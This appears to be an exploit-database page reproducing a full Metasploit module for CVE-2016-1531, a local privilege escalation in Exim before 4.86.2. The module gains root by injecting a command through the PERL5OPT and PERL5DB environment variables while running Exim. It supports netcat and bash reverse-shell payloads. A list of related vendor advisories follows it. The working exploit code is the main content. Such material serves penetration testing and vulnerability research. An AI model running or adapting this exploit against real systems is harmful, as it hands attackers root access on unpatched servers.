Lucene search
Metasploit1337DAY-ID-25565HistoryApr 15, 2016 - 12:00 a.m.
Exim - 'perl_startup' Privilege Escalation (Metasploit)
2016-04-1500:00:00
metasploit
0day.today
107
0.001 Low
EPSS
Percentile
22.2%
Exploit for linux platform in category local exploits
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
def initialize(info = {})
super(update_info(info,
'Name' => 'Exim "perl_startup" Privilege Escalation',
'Description' => %q{
This module exploits a Perl injection vulnerability in Exim < 4.86.2
given the presence of the "perl_startup" configuration parameter.
},
'Author' => [
'Dawid Golunski', # Vulnerability discovery
'wvu' # Metasploit module
],
'References' => [
%w{CVE 2016-1531},
%w{EDB 39549},
%w{URL http://www.exim.org/static/doc/CVE-2016-1531.txt}
],
'DisclosureDate' => 'Mar 10 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %w{shell meterpreter},
'Privileged' => true,
'Payload' => {
'BadChars' => "\x22\x27", # " and '
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic netcat netcat-e bash-tcp telnet'
}
},
'Targets' => [
['Exim < 4.86.2', {}]
],
'DefaultTarget' => 0
))
end
def check
if exploit('whoami') == 'root'
CheckCode::Vulnerable
else
CheckCode::Safe
end
end
def exploit(c = payload.encoded)
# PERL5DB technique from http://perldoc.perl.org/perlrun.html
cmd_exec(%Q{PERL5OPT=-d PERL5DB='exec "#{c}"' exim -ps 2>&-})
end
end
# 0day.today [2018-03-19] #Related
nessus
nessus
Debian DSA-3517-1 : exim4 - security update
2016-03-15 00:00:00
FreeBSD : exim -- local privillege escalation (7d09b9ee-e0ba-11e5-abc4-6fb07af136d2)
2016-03-03 00:00:00
Fedora 22 : exim-4.85.2-1.fc22 (2016-0e3ca94d88)
2016-03-14 00:00:00
prion
prion
Code injection
2016-04-07 23:59:00
osv
osv
exim4 - security update
2016-03-14 00:00:00
zdt
zdt
Exim 4.84-3 - Privilege Escalation
2016-03-09 00:00:00
Exim < 4.86.2 - Privilege Escalation
2016-03-10 00:00:00
packetstorm
packetstorm
Exim Local Privilege Escalation
2016-03-10 00:00:00
Exim 4.84-3 Local Root / Privilege Escalation
2016-03-08 00:00:00
Exim perl_startup Privilege Escalation
2016-04-14 00:00:00
openvas
openvas
Debian: Security Advisory (DSA-3517-1)
2016-03-13 00:00:00
Debian Security Advisory DSA 3517-1 (exim4 - security update)
2016-03-14 00:00:00
Fedora Update for exim FEDORA-2016-0
2016-03-14 00:00:00
metasploit
metasploit
Exim "perl_startup" Privilege Escalation
2016-04-13 22:51:20
fedora
fedora
[SECURITY] Fedora 22 Update: exim-4.85.2-1.fc22
2016-03-13 09:53:45
[SECURITY] Fedora 23 Update: exim-4.86.2-1.fc23
2016-03-12 11:53:03
debian
debian
[SECURITY] [DSA 3517-1] exim4 security update
2016-03-14 05:48:18
[SECURITY] [DSA 3517-1] exim4 security update
2016-03-14 05:48:18
archlinux
archlinux
exim: privilege escalation
2016-03-10 00:00:00
debiancve
debiancve
CVE-2016-1531
2016-04-07 23:59:00
ubuntucve
ubuntucve
CVE-2016-1531
2016-03-02 00:00:00
exploitpack
exploitpack
Exim 4.86.2 - Local Privilege Escalation
2016-03-10 00:00:00
Exim 4.84-3 - Local Privilege Escalation
2016-03-09 00:00:00
cve
cve
CVE-2016-1531
2016-04-07 23:59:00
freebsd
freebsd
exim -- local privillege escalation
2016-02-26 00:00:00
suse
suse
Security update for exim (important)
2016-03-11 14:16:09
Security update for exim (important)
2017-08-29 18:39:29
exploitdb
exploitdb
Exim 4.84-3 - Local Privilege Escalation
2016-03-09 00:00:00
Exim - 'perl_startup' Local Privilege Escalation (Metasploit)
2016-04-15 00:00:00
Exim < 4.86.2 - Local Privilege Escalation
2016-03-10 00:00:00
ubuntu
ubuntu
Exim vulnerabilities
2016-03-15 00:00:00